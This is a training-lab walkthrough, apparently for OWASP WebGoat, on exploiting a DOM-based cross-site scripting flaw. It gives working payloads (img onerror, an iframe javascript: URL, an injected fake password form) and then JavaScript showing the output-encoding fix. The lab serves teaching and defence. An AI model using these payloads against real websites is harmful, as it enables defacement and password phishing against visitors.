Ajax Security: LAB: DOM-Based Cross-Site Scripting and Solution


This lab uses a DOM-based XSS vulnerability to inject attacker-controlled markup into the page's DOM.

The injection point is the name entry field: whatever is typed there is written into the page without encoding, so HTML and script in the input are parsed and executed by the browser.

Step by step Guide

Stage 1  Deface this website

Deface this website using the image at the following location: OWASP IMAGE(

Enter an image tag in the name field, with the SRC attribute set to the image location given above:

<IMG SRC=""/>

Stage 2  Create a JavaScript alert using the image tag

Enter the script below. The SRC points at a resource that does not exist, so the image fails to load and the browser runs the onerror handler. Note that the attribute name is onerror (no hyphen); a misspelled attribute is ignored and the alert never fires.

<img src=x onerror=;;alert('XSS_Vulnerable') />

Stage 3  Create a JavaScript alert using the IFRAME tag

Enter the script below. The javascript: URL in the SRC attribute is executed when the frame is loaded.

<IFRAME SRC="javascript:alert('XSS_Vulnerable');"></IFRAME>

Stage 4  Create a fake login form

1. Create the fake login form by entering the script below into the name entry field. The onclick attribute must be spelled without a hyphen or the handler will not run. The run of <BR> tags pushes the real page content below the fold so that only the injected prompt is visible.

"Your password:<BR><input type = "password" name="pass"/><button onclick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>"

2. Once the text is entered, the page renders a fake password entry form. Anything the victim types into it is readable by the injected onclick handler, which here only displays it in an alert; a real attacker would send it to a server they control instead.

3. This concludes this lab.
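The defence that the lab's "Solution" turns on is output encoding at the DOM sink. The following is an added example, not code from the WebGoat lesson: it assumes (as the stages above imply) that the page builds an HTML string from the name field and assigns it to innerHTML, shows that each of the stage payloads survives that path as live markup, and shows the same payloads neutralised by HTML-encoding before insertion or by writing to textContent instead. The payload strings are constructed copies of the ones above; the function names are my own.

```javascript
// Added example, not part of the WebGoat lesson: the DOM sink this lab abuses
// and the output-encoding fix for it. Runs unchanged in a browser or in Node.

// Constructed copies of the lab payloads from stages 2 to 4.
const PAYLOADS = {
  imgAlert: "<img src=x onerror=;;alert('XSS_Vulnerable') />",
  iframeAlert: "<IFRAME SRC=\"javascript:alert('XSS_Vulnerable');\"></IFRAME>",
  fakeLogin: "Your password:<BR><input type=\"password\" name=\"pass\"/>" +
    "<button onclick=\"alert('I have your password: ' + pass.value);\">Submit</button>",
};

// Vulnerable pattern (assumed to match the lesson page): the name typed into
// the field is concatenated into an HTML string which the page then assigns
// to an element's innerHTML, so the browser parses the payload as markup and
// the <img>, <iframe> and onclick handlers become live.
function renderVulnerable(name) {
  return "Hello, " + name; // caller does: greeting.innerHTML = renderVulnerable(name)
}

// Fix: HTML-encode the characters that can open a tag, attribute or entity
// before the value reaches innerHTML. This is the encoding for text content;
// values placed inside attributes, URLs or script blocks need context-specific
// encoding instead.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  return "Hello, " + escapeHtml(name);
}

// Check: does the string still contain anything the HTML parser would treat
// as the start of a tag? After escaping there is no raw '<' left, so no tag
// and no event-handler attribute can be created.
function containsTag(html) {
  return /<\/?[a-zA-Z]/.test(html);
}

// Preferred alternative when writing to a real DOM element: textContent is
// never parsed as HTML, so the payload is displayed literally.
function setGreeting(element, name) {
  element.textContent = "Hello, " + name;
  return element.textContent;
}

for (const [stage, payload] of Object.entries(PAYLOADS)) {
  console.log(stage,
    "innerHTML would parse a tag:", containsTag(renderVulnerable(payload)),
    "after escaping:", containsTag(renderSafe(payload)));
}
```

The stage 5 fix in the lesson is the same idea: encode the name field value before it is written into the page, or write it with textContent rather than innerHTML.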
